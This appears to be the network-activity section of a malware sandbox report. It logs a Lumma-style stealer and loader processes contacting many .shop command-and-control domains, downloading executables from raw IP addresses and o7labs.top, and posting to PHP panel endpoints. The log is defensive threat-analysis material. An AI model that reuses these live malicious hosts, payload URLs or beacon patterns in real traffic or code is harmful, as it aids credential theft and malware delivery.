CF-RAY: 89598c81c9b96425-LHR
alt-svc: h3=":443"; ma=86400
DNS

flourhishdiscovrw.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

flourhishdiscovrw.shop

IN A

Response

flourhishdiscovrw.shop

IN A

172.67.197.45

flourhishdiscovrw.shop

IN A

104.21.76.157
POST

https://flourhishdiscovrw.shop/api

lummac2.exe

Remote address:

172.67.197.45:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: flourhishdiscovrw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=id538105mgi56t4b3j4at5ll2p; expires=Sat, 12-Oct-2024 01:12:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ifwCgZATnA%2BzCKiVHHzF7CqQkiG0sst%2FH%2BaOh7ZKEfgYO%2ByDn%2BbG97chLa72dTt7mXIyx49j2cYn3F0Wkkh7G8ksvhvS33W0lwwR9yIaovOzJ1ZtAs4%2BlmiU2POPSk2NyO%2Fl5Ze30PI2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c84792079b2-LHR
alt-svc: h3=":443"; ma=86400
DNS

landdumpycolorwskfw.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

landdumpycolorwskfw.shop

IN A

Response

landdumpycolorwskfw.shop

IN A

172.67.128.71

landdumpycolorwskfw.shop

IN A

104.21.0.207
DNS

152.59.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.59.21.104.in-addr.arpa

IN PTR

Response
POST

https://landdumpycolorwskfw.shop/api

lummac2.exe

Remote address:

172.67.128.71:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: landdumpycolorwskfw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=c1p87qgaq0hkvoea1lm9i6h215; expires=Sat, 12-Oct-2024 01:12:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJhYMD0eaSkejIcIHdncfdQSuwjuFIQEL6RI4V1GlG1AcH3jp7EWGGA%2F%2BS5e1yyH%2B91udOqhIkkFkOLaFxf%2Bbg5ttWIL0ZwZDVGK%2BZIU5pTjvvvcd%2BC8GZU62l7A5doFxHqbwfDwppWd%2FCY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c87380b93eb-LHR
alt-svc: h3=":443"; ma=86400
DNS

ohfantasyproclaiwlo.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

ohfantasyproclaiwlo.shop

IN A

Response
DNS

barebrilliancedkoso.shop

lummac2.exe

Remote address:

8.8.8.8:53

Request

barebrilliancedkoso.shop

IN A

Response

barebrilliancedkoso.shop

IN A

104.21.92.202

barebrilliancedkoso.shop

IN A

172.67.197.178
POST

https://barebrilliancedkoso.shop/api

lummac2.exe

Remote address:

104.21.92.202:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: barebrilliancedkoso.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=4gsfhhu88sbjdbe6p90smcgc6g; expires=Sat, 12-Oct-2024 01:12:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VD3b4MnpNh58ifKek%2BV%2BK03MY39uphuSadZfGwcnvb%2Fv1%2BuTUC5XodmLrJ72ZZaTR9kJQNetRCzMVPzyHuMpRqxWYNwItxaIGTHP0dMhXP%2FdrrISGGRToSi9ITTryewguemwzbt3NWRAEtA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c8e8a1c6349-LHR
alt-svc: h3=":443"; ma=86400
DNS

45.197.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.197.67.172.in-addr.arpa

IN PTR

Response
DNS

71.128.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.128.67.172.in-addr.arpa

IN PTR

Response
DNS

202.92.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.92.21.104.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.116/NewLatest.exe

axplong.exe

Remote address:

185.172.128.116:80

Request

GET /NewLatest.exe HTTP/1.1
Host: 185.172.128.116

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:05 GMT
Content-Type: application/octet-stream
Content-Length: 424960
Last-Modified: Sun, 16 Jun 2024 06:41:45 GMT
Connection: keep-alive
ETag: "666e8929-67c00"
Accept-Ranges: bytes
DNS

willingyhollowsk.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

willingyhollowsk.shop

IN A

Response

willingyhollowsk.shop

IN A

172.67.177.28

willingyhollowsk.shop

IN A

104.21.91.177
POST

https://willingyhollowsk.shop/api

MSBuild.exe

Remote address:

172.67.177.28:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: willingyhollowsk.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=52hbovdud7bf0ogci9ht8hrk4a; expires=Sat, 12-Oct-2024 01:12:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=irvIpC6kQA09EeFZUEK9Rw2ModjfOurMu%2BpW%2FCkQniSLOcBITg9j%2FHes0e6f7iVjkiKDKH%2BLpsEA9g2ewypuOBEubKgPPndCFti77Gnv7xiNysKpQdrTUmF6SRbXAc4%2BbXk02G0sxUk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c97a82c60dc-LHR
alt-svc: h3=":443"; ma=86400
DNS

116.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.128.172.185.in-addr.arpa

IN PTR

Response
DNS

28.177.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.177.67.172.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

distincttangyflippan.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

distincttangyflippan.shop

IN A

Response

distincttangyflippan.shop

IN A

172.67.221.10

distincttangyflippan.shop

IN A

104.21.75.100
POST

https://distincttangyflippan.shop/api

MSBuild.exe

Remote address:

172.67.221.10:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: distincttangyflippan.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=6ruq7hm462vbe58u01883vlmq9; expires=Sat, 12-Oct-2024 01:12:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpvpZGWj2m5zzXgnu6XoZlYEVu4d3tcabbW2bYX9H2kG5fUkN5ChrGO4ORZMA3IHgHMtX%2FRAeqge68sV%2FOzSUS3Mz5tTZOYwsTe22VA%2BcThyWhZ%2F8HU6O%2FVtDhxWqAvxVWf91EPObF0S2WGy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c9a5d829494-LHR
alt-svc: h3=":443"; ma=86400
DNS

macabrecondfucews.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

macabrecondfucews.shop

IN A

Response

macabrecondfucews.shop

IN A

172.67.151.223

macabrecondfucews.shop

IN A

104.21.1.23
POST

https://macabrecondfucews.shop/api

MSBuild.exe

Remote address:

172.67.151.223:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: macabrecondfucews.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ba35s4onttltsu3jg561tgatgt; expires=Sat, 12-Oct-2024 01:12:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9GWciFWgEkP9yqjyx2uLMHxhMSqguKrDMqQ%2BxvDK9Lir6eYOEY1%2FyfiQ%2BQZ4MbHTCeUAliDnwySFB0Wp7IcPAWxMinKwotCUFRLhg7lXuyFhkni%2FuJexyFkdzCcgy9gZ4mdgQKasYz7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c9cd9ca23ec-LHR
alt-svc: h3=":443"; ma=86400
DNS

greentastellesqwm.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

greentastellesqwm.shop

IN A

Response

greentastellesqwm.shop

IN A

104.21.30.167

greentastellesqwm.shop

IN A

172.67.173.64
POST

https://greentastellesqwm.shop/api

MSBuild.exe

Remote address:

104.21.30.167:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: greentastellesqwm.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=033888cp62qvnm3aeah02b4hg6; expires=Sat, 12-Oct-2024 01:12:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UIBUM9ungja6rygnSf%2BdG2ki7MqcRpFwbutT2Iq0lLn50YRomyMSYIuPNy5iDGJM6WAm0iqHPf5XxeUnsix6iPPqy7nGCzlJkr3mW3US7W3osxoKqqw5CaGMvyQk%2F4z7FOwD%2Fdi6nE4l"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598c9fddc57779-LHR
alt-svc: h3=":443"; ma=86400
DNS

10.221.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.221.67.172.in-addr.arpa

IN PTR

Response
DNS

223.151.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

223.151.67.172.in-addr.arpa

IN PTR

Response
DNS

stickyyummyskiwffe.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

stickyyummyskiwffe.shop

IN A

Response

stickyyummyskiwffe.shop

IN A

104.21.76.185

stickyyummyskiwffe.shop

IN A

172.67.198.233
POST

https://stickyyummyskiwffe.shop/api

MSBuild.exe

Remote address:

104.21.76.185:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: stickyyummyskiwffe.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=c1f8t06iv9b6v1f5f03s79lhfv; expires=Sat, 12-Oct-2024 01:12:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1Gw%2BegqFW50iyiwA2vn4YmySOdYAM8Yj%2FZlyVGFRG2qak4q1DNMLJS6qKKibYHZRPjCupusENeXMy4S32F21jpYfgkdz%2BtGoKs%2FtBvRjG1rPTR0P3SWrO7ZDK5bndYp8JKHFH8jGEMilA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598ca2bd5363a3-LHR
alt-svc: h3=":443"; ma=86400
DNS

sturdyregularrmsnhw.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

sturdyregularrmsnhw.shop

IN A

Response

sturdyregularrmsnhw.shop

IN A

172.67.204.23

sturdyregularrmsnhw.shop

IN A

104.21.52.210
POST

https://sturdyregularrmsnhw.shop/api

MSBuild.exe

Remote address:

172.67.204.23:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sturdyregularrmsnhw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=3e6kara0cprsjo1idgi2qgk9bf; expires=Sat, 12-Oct-2024 01:12:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sy1WedGRto54a1T5I3PVIZh%2BADfuiUeewFv4d%2Fjh0S1TscqZR653lcTQWZdcISheEFNsEbivHVAEHDOBy0aOWItkhXt1vIC5CX8LuCrqBwOYUqvKdwxClPDmAFcxyiKUtfIvNAkOkyE1ZaA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598ca5bb33948f-LHR
alt-svc: h3=":443"; ma=86400
DNS

167.30.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.30.21.104.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

185.76.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.76.21.104.in-addr.arpa

IN PTR

Response
DNS

lamentablegapingkwaq.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

lamentablegapingkwaq.shop

IN A

Response

lamentablegapingkwaq.shop

IN A

172.67.144.236

lamentablegapingkwaq.shop

IN A

104.21.10.78
POST

https://lamentablegapingkwaq.shop/api

MSBuild.exe

Remote address:

172.67.144.236:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lamentablegapingkwaq.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=temtfgs9pej383rt9jdbbmav6t; expires=Sat, 12-Oct-2024 01:12:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZ3Xr2QSfBXHmiHv7shhk4cWEExDYAQ9VsNR4PO%2BWv5Kmi5DDr5vg0hCfLjFNBNCzcT49owSS3zcu6NMuvgsogR6xYBb48eVzPA28gWqHRNHJXBDXG3CY9A6V%2FIXk45IuK7XSDJzH7f93UcE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598ca878e677ab-LHR
alt-svc: h3=":443"; ma=86400
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

innerverdanytiresw.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

innerverdanytiresw.shop

IN A

Response

innerverdanytiresw.shop

IN A

172.67.168.179

innerverdanytiresw.shop

IN A

104.21.79.21
POST

https://innerverdanytiresw.shop/api

MSBuild.exe

Remote address:

172.67.168.179:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: innerverdanytiresw.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=012k0hq1li3sq66ugm5d543slh; expires=Sat, 12-Oct-2024 01:12:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaLwGP7VXjPndXVk4M3Z4kyVj8RYpTc7Qj470DF%2BKAxKNxifOL900bSRq07SaFkf6KBIQu09B7KnUkwHz%2F4%2BjL%2BzZJgyI%2BbZAxxBuUWT2jPeC%2B2eEIzI%2BWLiyhaibDLXS2fA5Pdj0CnSiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598cab3b8093ed-LHR
alt-svc: h3=":443"; ma=86400
DNS

23.204.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.204.67.172.in-addr.arpa

IN PTR

Response
DNS

236.144.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

236.144.67.172.in-addr.arpa

IN PTR

Response
DNS

standingcomperewhitwo.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

standingcomperewhitwo.shop

IN A

Response

standingcomperewhitwo.shop

IN A

172.67.141.50

standingcomperewhitwo.shop

IN A

104.21.9.31
POST

https://standingcomperewhitwo.shop/api

MSBuild.exe

Remote address:

172.67.141.50:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: standingcomperewhitwo.shop

Response

HTTP/1.1 200 OK

Date: Tue, 18 Jun 2024 07:26:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=cds72msinqbspkt7mpjj4qphiq; expires=Sat, 12-Oct-2024 01:12:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qiFnFZK1WCP9Qk%2BVwwDPQPO6jhEZlRZKcOMHZ%2BK8wmMs6i17xVrL843LQEKyByARKovNtS7yrawZo4KtsB0KRvx%2BXcdUh20IDEBCKT%2Bi14CiqMoU45%2FQk7dxLVl4eCRoSC9b5rcDSnmGu49%2Bng%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89598cadddd5653f-LHR
alt-svc: h3=":443"; ma=86400
DNS

179.168.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

179.168.67.172.in-addr.arpa

IN PTR

Response
DNS

50.141.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.141.67.172.in-addr.arpa

IN PTR

Response
DNS

67.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.65.42.5.in-addr.arpa

IN PTR

Response
DNS

o7labs.top

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

o7labs.top

IN A

Response

o7labs.top

IN A

91.92.240.234
GET

http://o7labs.top/visual/bin.exe

axplong.exe

Remote address:

91.92.240.234:80

Request

GET /visual/bin.exe HTTP/1.1
Host: o7labs.top

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jun 2024 07:26:19 GMT
Content-Type: application/octet-stream
Content-Length: 434688
Last-Modified: Sun, 16 Jun 2024 12:32:13 GMT
Connection: keep-alive
ETag: "666edb4d-6a200"
Accept-Ranges: bytes
DNS

234.240.92.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.240.92.91.in-addr.arpa

IN PTR

Response
DNS

o7labs.top

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

o7labs.top

IN A

Response
DNS

o7labs.top

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

o7labs.top

IN A

Response

o7labs.top

IN A

91.92.240.234
DNS

23.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.236.111.52.in-addr.arpa

IN PTR

Response

204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B

tls, http2

2.6kB
10.3kB
20
16

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De82xyhWKeHi5TqTWVg85uj2DVUCUyJLi8VnIfKXDiHh4gt-64hydnoSG8OWSLCcZjMUPODtwf7ZdEMKIwAeqyFD7Uc4IkPJ7QTkBWATtDuC6J0zvsB2fTAQlZAe3DX_IP-eZFb8q7rkUrc4NxJ9Qm59G76THJ5bIrNHrsN-82jMAcf-wha%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3D09da252c7046143dbe644344a7e47664&TIME=20240611T230319Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525&muid=12D800F85EB4CAF16CA7FE64B9B0CF8B

HTTP Response

204
2.17.107.131:443

https://www.bing.com/aes/c.gif?RG=3685eae219d04711837b0cb138f2e682&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T230319Z&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525

tls, http2

1.5kB
5.5kB
17
15

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=3685eae219d04711837b0cb138f2e682&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T230319Z&adUnitId=11730597&localId=w:12D800F8-5EB4-CAF1-6CA7-FE64B9B0CF8B&deviceId=6825835407611525

HTTP Response

200
147.45.47.155:80

http://147.45.47.155/ku4Nor9/index.php

http

explortu.exe

1.9kB
2.3kB
17
14

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

